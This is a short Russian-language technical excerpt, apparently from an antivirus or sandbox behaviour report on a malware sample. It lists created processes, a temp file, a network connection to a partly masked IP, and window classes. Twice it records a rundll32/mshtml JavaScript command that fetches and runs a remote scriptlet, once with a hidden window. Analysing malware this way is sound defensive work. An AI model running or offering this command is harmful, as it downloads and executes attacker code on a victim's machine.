Техническая информация
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://13.##.179.221/doc/msword');
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1181723.cvr
- '13.##.179.221':80
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://13.##.179.221/doc/msword');' (со скрытым окном)